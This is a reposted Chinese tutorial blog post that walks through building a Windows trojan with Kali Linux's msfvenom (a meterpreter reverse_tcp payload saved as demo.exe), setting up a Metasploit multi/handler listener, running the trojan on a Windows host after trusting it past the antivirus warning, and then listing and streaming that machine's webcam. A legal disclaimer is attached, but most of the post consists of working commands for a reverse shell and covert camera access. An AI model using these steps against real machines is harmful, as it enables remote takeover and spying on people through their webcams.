1.阅读前的声明
本文章中生成的木马带有一定的攻击性,使用时请遵守网络安全相关的法律法规(恶意攻击操作系统属于违法行为)。
2.利用kali操作系统的metasploit攻击windows操作系统
- kali中打开终端最好是进入root
sudo su
- 获取IP
ip address
- 重新打开一个终端
msfconsole init //(初始化metasploit数据库)
- 输入指令,注:-p表示攻击载荷,表示的是说明这个程序需要载入什么功能,这里就是windows/x64/meterpreter/reverse_tcp(开始操作系统的远程连接服务),后面的是远程连接的执行主机和该连接使用的端口,-f表示的生成的文件格式,-o表示的output(生成),demo.exe表示的是生成的文件名称。接下来就可以找到生成的木马程序了:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=2中获取的IP lport=9999-f exe -o demo.exe
- 开启监视
use exploit/multi/handler(使用exploit里面的处理程序模块)
set payload windows/x64/meterpreter/reverse_tcp(设置靶机中开启的服务)
set lhost 2中获取的IP(设置靶机中该服务权限的使用者)
set lport 9999(靶机中连接使用的端口)
run
- 将4中得到的demo.exe复制到本机windows系统中(自己找找在哪里)可能会被本机火绒提示问题,记得信任就好了
- 在本机windows中运行demo.exe在kali刚才终端中
webcam_list
可查看本机摄像头webcam_stream
可查看打开摄像头
本文转载自: https://blog.csdn.net/Agaoqihao/article/details/129972449
版权归原作者 GW- 所有, 如有侵权,请联系我们删除。
版权归原作者 GW- 所有, 如有侵权,请联系我们删除。